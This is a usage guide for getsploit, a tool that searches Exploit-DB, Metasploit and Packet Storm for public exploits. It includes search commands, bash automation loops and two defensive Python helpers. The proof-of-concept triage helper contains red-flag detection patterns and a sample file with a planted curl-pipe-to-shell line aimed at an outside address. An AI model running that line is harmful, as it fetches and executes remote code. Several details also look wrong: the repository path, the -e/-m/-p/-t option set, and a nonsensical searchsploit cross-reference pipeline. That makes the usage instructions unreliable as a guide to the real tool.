getsploit
Overview
getsploit is a command-line tool that searches and downloads exploit code from multiple repositories including Exploit-DB, Metasploit Framework, and Packet Storm Security. It aggregates exploit intelligence for vulnerability research and authorized penetration testing activities.
getsploit is essential for:
- Exploit proof-of-concept research
- Vulnerability validation and verification
- Penetration testing and assessment
- Exploit code adaptation and customization
- Security research and analysis
- Attack surface evaluation
Installation
Prerequisites
- Python 3.6+
- pip (Python package manager)
- Linux/macOS/Windows
- Internet connectivity
Install via pip
```bash
# Install from PyPI
pip install getsploit
# Verify installation
getsploit -V
getsploit --help
```
Install from Source
```bash
# Clone repository
git clone https://github.com/vulhub/getsploit.git
cd getsploit
# Install dependencies
pip install -r requirements.txt
# Run directly
python -m getsploit --help
# Or install locally
pip install -e .

# Update to latest version
pip install --upgrade getsploit
# Check version
getsploit --version
```
Core Commands
Basic Usage
| Command | Purpose | Example |
|---|---|---|
| getsploit <query> | Search for exploits | getsploit apache 2.4.49 |
| getsploit -h | Show help | getsploit -h |
| getsploit -V | Show version | getsploit -V |
| getsploit --update | Update exploit database | getsploit --update |
Search Options
| Option | Purpose | Example |
|---|---|---|
| -e, --edb | Search Exploit-DB only | getsploit -e "CVE-2021-1234" |
| -m, --msf | Search Metasploit only | getsploit -m "windows privilege" |
| -p, --pst | Search Packet Storm only | getsploit -p "php vulnerability" |
| -t, --type | Filter by exploit type | getsploit -t "remote" apache |
Basic Search Operations
Simple Exploit Search
```bash
# Search all repositories
getsploit apache 2.4.49
# Search by CVE number
getsploit CVE-2021-44228
# Search by application
getsploit wordpress
# Search by vulnerability type
getsploit "remote code execution"
```
Search with Repository Filter
```bash
# Search Exploit-DB only
getsploit -e "nginx privilege escalation"
# Search Metasploit only
getsploit -m "windows domain privilege"
# Search Packet Storm only
getsploit -p "php injection"
```
Filter by Exploit Type
```bash
# Find remote code execution exploits
getsploit -t "remote" "apache"
# Find local privilege escalation
getsploit -t "local" "kernel"
# Find denial of service
getsploit -t "dos" "dns"
```
Exploit Database Search Strategies
Search by Vulnerability
```bash
# SQL injection exploits
getsploit "sql injection" wordpress
# Cross-site scripting
getsploit "xss" "drupal"
# Path traversal
getsploit "path traversal" php
# Command injection
getsploit "command injection" web
```
Search by Application
```bash
# WordPress vulnerabilities
getsploit wordpress
# Drupal exploits
getsploit drupal
# Apache web server
getsploit apache
# PHP framework vulnerabilities
getsploit laravel
```
Search by OS/Platform
```bash
# Windows privilege escalation
getsploit -t "local" "windows"
# Linux kernel exploits
getsploit -t "local" "linux kernel"
# macOS vulnerabilities
getsploit -t "remote" "macos"
```
Advanced Search Techniques
Multi-Term Searches
```bash
# Combine application and version
getsploit "apache 2.4.49"
# With vulnerability type
getsploit "wordpress 5.0 remote"
# Application and CVE
getsploit "wordpress CVE-2020"
```
Specific CVE Research
```bash
# Log4j vulnerability (widespread)
getsploit CVE-2021-44228
# WordPress plugin vulnerability
getsploit CVE-2020-6450
# Kernel privilege escalation
getsploit CVE-2021-22555
```
Vulnerability Pattern Searches
```bash
# All Struts vulnerabilities
getsploit "apache struts"
# Tomcat exploits
getsploit "tomcat"
# Node.js vulnerabilities
getsploit "node.js" -t "remote"
```
Download and Extraction
Download Exploit Code
```bash
# Search returns exploit information
getsploit apache 2.4.49
# Output shows:
# - Exploit ID
# - Title
# - Type
# - Link to code
# - Source repository
```
View Exploit Details
```bash
# Search with verbose output
getsploit -v apache 2.4.49
# Review exploit information before download
# - Author
# - Verification status
# - Last updated date
```
Save Search Results
```bash
# Redirect output to file
getsploit wordpress > wordpress_exploits.txt
# Save specific results
getsploit -e "sql injection" > edb_sqli.txt
# Parse results programmatically (case-insensitive, so CVE-... and cve-... both match)
getsploit apache 2.4.49 | grep -oiE "exploit-[0-9]+|cve-[0-9-]+"
```
Practical Exploitation Workflows
Vulnerability Assessment Workflow
```bash
# 1. Identify target technology
# Example: WordPress 5.0 running
# 2. Search for known vulnerabilities
getsploit "wordpress 5.0"
# 3. Review exploit types
getsploit -e "wordpress 5.0" | grep -i "plugin\|theme"
# 4. Download promising exploits
# (Follow links from search results)
# 5. Analyze code for applicability
# (Test in lab environment first)
```
Known CVE Exploitation
```bash
# 1. Identify CVE
# Example: CVE-2021-44228 (Log4j)
# 2. Find exploits
getsploit CVE-2021-44228
# 3. Search specific sources
getsploit -m CVE-2021-44228 # Metasploit modules
getsploit -e CVE-2021-44228 # Exploit-DB POCs
# 4. Select appropriate exploit
# (Choose by platform, method, complexity)
```
Application-Specific Research
```bash
# 1. Identify running application
# Example: Apache Struts 2.0
# 2. Search comprehensively
getsploit "apache struts"
# 3. Filter by vulnerability type
getsploit -t "remote" "apache struts"
# 4. Research by year
getsploit "struts 2009" # Earlier vulnerabilities
getsploit "struts 2017" # More recent exploits
```
Integration with Other Tools
Chain with Metasploit
```bash
# Find exploit in Metasploit
getsploit -m "apache struts"
# Get module path from results
# Load in msfconsole (-x runs a console command at startup; -m only adds a module directory)
msfconsole -x "use exploit/linux/http/apache_struts_rce"
```
Integration with searchsploit
```bash
# Alternative: Use searchsploit (locally cached)
searchsploit "apache struts"
# Cross-reference with getsploit
getsploit "apache struts" | grep -v "$(searchsploit -t apache struts)"
```
Organize Results for Testing
```bash
# Save organized results
mkdir -p exploit_research/wordpress
getsploit wordpress > exploit_research/wordpress/search_results.txt
mkdir -p exploit_research/drupal
getsploit drupal > exploit_research/drupal/search_results.txt
# Create index
echo "# Exploit Research Results" > exploit_research/README.md
```
Exploit Classification and Analysis
Classify by Exploitation Method
```bash
# Remote code execution
getsploit -t "remote" "application"
# Privilege escalation
getsploit -t "local" "privilege"
# Denial of service
getsploit -t "dos" "service"
# Authentication bypass
getsploit "authentication bypass" app
```
Analyze Exploit Reliability
```bash
# Search for verified/tested exploits
getsploit -e "apache" # Exploit-DB (verified)
# Search for modules
getsploit -m "wordpress" # Metasploit (tested)
# Review multiple sources
getsploit -p "wordpress" # Packet Storm (research)
```
Filter by Exploit Status
```bash
# Recently added exploits
getsploit -e "2024" wordpress
# Older, battle-tested exploits
getsploit -e "2015" linux
# Compare exploit counts
getsploit -m "apache" | wc -l
getsploit -e "apache" | wc -l
```
Automation Scripts
Batch Vulnerability Scanning
```bash
#!/bin/bash
# Search for exploits for multiple CVEs
CVES=(
    "CVE-2021-44228"
    "CVE-2021-22555"
    "CVE-2020-1938"
)
OUTPUT_DIR="cve_research"
mkdir -p "$OUTPUT_DIR"
for cve in "${CVES[@]}"; do
    echo "Researching $cve..."
    getsploit "$cve" > "$OUTPUT_DIR/${cve}_results.txt"
    # Count exploits found
    COUNT=$(wc -l < "$OUTPUT_DIR/${cve}_results.txt")
    echo "$cve: $COUNT results found"
done
```
Vulnerability Database Builder
```bash
#!/bin/bash
# Build database of exploits for target technologies
TARGETS=(
    "wordpress"
    "drupal"
    "joomla"
    "apache"
    "nginx"
)
DB_DIR="exploit_database"
mkdir -p "$DB_DIR"
for target in "${TARGETS[@]}"; do
    echo "Building database for $target..."
    # Search all sources
    getsploit -e "$target" > "$DB_DIR/${target}_edb.txt"
    getsploit -m "$target" > "$DB_DIR/${target}_msf.txt"
    getsploit -p "$target" > "$DB_DIR/${target}_pst.txt"
    # Create summary
    TOTAL=$(($(wc -l < "$DB_DIR/${target}_edb.txt") + \
             $(wc -l < "$DB_DIR/${target}_msf.txt") + \
             $(wc -l < "$DB_DIR/${target}_pst.txt")))
    echo "$target: $TOTAL exploits indexed"
done
```
Continuous Vulnerability Monitoring
```bash
#!/bin/bash
# Monitor new exploits for critical applications
MONITOR_TARGETS=(
    "wordpress"
    "apache"
    "openssh"
)
RESULTS_DIR="vulnerability_monitoring"
mkdir -p "$RESULTS_DIR"
DATE=$(date +%Y%m%d)
for target in "${MONITOR_TARGETS[@]}"; do
    LATEST_FILE="$RESULTS_DIR/${target}_latest.txt"
    CURRENT_FILE="$RESULTS_DIR/${target}_${DATE}.txt"
    # Get current exploits
    getsploit "$target" | sort > "$CURRENT_FILE"
    # Compare with previous
    if [ -f "$LATEST_FILE" ]; then
        NEW_EXPLOITS=$(comm -13 "$LATEST_FILE" "$CURRENT_FILE")
        if [ -n "$NEW_EXPLOITS" ]; then
            echo "New exploits for $target:"
            echo "$NEW_EXPLOITS"
        fi
    fi
    # Update latest
    cp "$CURRENT_FILE" "$LATEST_FILE"
done
```
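
For a defender, the useful output of the monitoring loop above is which still-unpatched CVEs have just gained a public exploit reference. The following is an added example, not part of getsploit or the original page: it compares two saved snapshots by CVE ID only and joins the new IDs against a scanner export. The function names, the snapshot line layout and the `OPEN_FINDINGS` structure are assumptions made for illustration.

```python
import re

CVE_RE = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)


def cve_ids(text):
    """Extract normalised (upper-case) CVE IDs from free-form search output."""
    return {m.upper() for m in CVE_RE.findall(text)}


def newly_exploitable(previous, current, open_findings):
    """CVEs first seen in `current` that are still unpatched somewhere.

    open_findings maps CVE ID -> set of affected assets (scanner export).
    Returns [(cve, [assets])], widest exposure first.
    """
    fresh = cve_ids(current) - cve_ids(previous)
    hits = [(cve, sorted(open_findings[cve])) for cve in fresh if cve in open_findings]
    return sorted(hits, key=lambda h: (-len(h[1]), h[0]))


# Constructed snapshots; the line layout is invented, only the CVE IDs matter.
PREVIOUS = """\
result-001  Apache Tomcat AJP file read (CVE-2020-1938)
"""
CURRENT = """\
result-001  Apache Tomcat AJP file read (CVE-2020-1938)
result-002  Log4j JNDI lookup PoC (cve-2021-44228)
result-003  Netfilter local privilege escalation (CVE-2021-22555)
"""
# Constructed scanner export: unpatched CVE -> hosts.
OPEN_FINDINGS = {
    "CVE-2020-1938": {"tomcat-01"},
    "CVE-2021-44228": {"app-02", "app-01", "search-01"},
}

if __name__ == "__main__":
    for cve, assets in newly_exploitable(PREVIOUS, CURRENT, OPEN_FINDINGS):
        print(f"{cve}: exploit reference appeared; unpatched on {', '.join(assets)}")
```

Matching on CVE IDs rather than whole lines keeps the comparison stable when a source rewrites a title or reorders its results.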
Search Result Analysis
Parse Search Results
```bash
# Extract exploit IDs
getsploit apache | grep -oE "EDB-[0-9]+" | sort -u
# Extract CVE references
getsploit wordpress | grep -oE "CVE-[0-9-]+" | sort -u
# Count results by type
getsploit apache | grep -c "remote"
getsploit apache | grep -c "local"
```
Compare Sources
```bash
# Find exploits in Exploit-DB
getsploit -e wordpress > edb_wp.txt
# Find exploits in Metasploit
getsploit -m wordpress > msf_wp.txt
# Find unique to Exploit-DB
comm -23 <(sort edb_wp.txt) <(sort msf_wp.txt)
# Find in all sources
getsploit wordpress | sort -u > all_wp.txt
```
Best Practices
Responsible Exploit Research
- Verify applicability: Confirm vulnerability affects target before exploitation
- Test in isolated lab: Always test in controlled environment first
- Review exploit code: Analyze code for malicious intent before execution
- Maintain documentation: Track exploit usage for reporting
- Only test authorized targets: Ensure proper authorization before testing
- Keep audit trail: Document all exploit testing activities
- Update regularly: Keep exploit database current with --update
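
The "Review exploit code" practice above can be given a first automated pass before anything runs in the lab. This is an added example, not part of getsploit or the original page: a static triage that flags common red flags in a downloaded PoC and any hard-coded address outside the lab ranges. The rule set, the `triage` function and the `lab_networks` parameter are illustrative assumptions, and a clean result does not replace reading the code.

```python
import ipaddress
import re

# Heuristic red flags for third-party PoC code (illustrative, not exhaustive).
PATTERNS = {
    "download piped to a shell": re.compile(r"\b(?:curl|wget)\b[^\n]*\|\s*(?:ba)?sh\b"),
    "decode-and-execute": re.compile(
        r"\b(?:exec|eval)\s*\([^\n]*(?:b64decode|fromhex|decompress)"),
    "long encoded literal": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}"),
    "recursive delete of a root path": re.compile(
        r"\brm\s+-\w*r\w*\s+(?:/|~|\$HOME)(?:\s|$|\*)"),
}
IPV4 = re.compile(r"(?<![\d.])(?:\d{1,3}\.){3}\d{1,3}(?![\d.])")


def triage(source, lab_networks=("127.0.0.0/8",)):
    """Return sorted (line_number, reason) findings for one PoC file's text."""
    nets = [ipaddress.ip_network(n) for n in lab_networks]
    findings = set()
    for lineno, line in enumerate(source.splitlines(), start=1):
        for reason, pattern in PATTERNS.items():
            if pattern.search(line):
                findings.add((lineno, reason))
        for candidate in IPV4.findall(line):
            try:
                addr = ipaddress.ip_address(candidate)
            except ValueError:  # octet > 255, so not an address
                continue
            if not any(addr in net for net in nets):
                findings.add((lineno, f"hard-coded address outside lab: {addr}"))
    return sorted(findings)


# Constructed sample: a PoC with a planted fetch-and-run line.
SAMPLE_POC = """\
#!/usr/bin/env python3
# usage: poc.py <target>
import os, sys
target = sys.argv[1]          # lab host, e.g. 10.10.5.20
os.system("curl -s http://203.0.113.7/setup.sh | sh")
print("sending probe to", target)
"""

if __name__ == "__main__":
    lab = ("127.0.0.0/8", "10.10.0.0/16")  # assumed lab ranges
    for lineno, reason in triage(SAMPLE_POC, lab_networks=lab):
        print(f"line {lineno}: {reason}")
```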
Effective Search Strategies
- Use specific terms: More specific searches yield relevant results
- Include version numbers: Narrow results with application versions
- Cross-reference CVEs: Verify CVE numbers with multiple sources
- Search all repositories: Different sources contain unique exploits
- Review metadata: Check author, date, and verification status
- Compare multiple exploits: Select most reliable implementation
Troubleshooting
| Issue | Solution |
|---|---|
| No results found | Try broader search terms or different keywords |
| Connection errors | Check internet connectivity; verify target is accessible |
| Old database | Run getsploit --update to refresh exploit database |
| Exploit not found | Try searching by CVE number or different terms |
| Metasploit results | Verify Metasploit Framework installation for module paths |
Update and Maintenance
Keep Database Current
```bash
# Update exploit database
getsploit --update
# Schedule regular updates (cron): daily at midnight
0 0 * * * /usr/local/bin/getsploit --update
```
Resources
- GitHub: https://github.com/vulhub/getsploit
- Exploit-DB: https://www.exploit-db.com/
- Metasploit Framework: https://www.metasploit.com/
- Packet Storm Security: https://packetstormsecurity.com/
- CVE Details: https://www.cvedetails.com/
getsploit aggregates exploit intelligence from multiple authoritative sources:
- Exploit-DB - Largest public exploit repository
- Metasploit Framework - Professional exploitation platform
- Packet Storm Security - Historical vulnerability research
Key capabilities include:
- Multi-repository exploit searching
- Flexible filtering by type and source
- CVE-based vulnerability research
- Integration with exploitation frameworks
- Automated vulnerability monitoring
Use getsploit to research known vulnerabilities, validate attack vectors, and build exploit collections for authorized penetration testing and security assessment activities.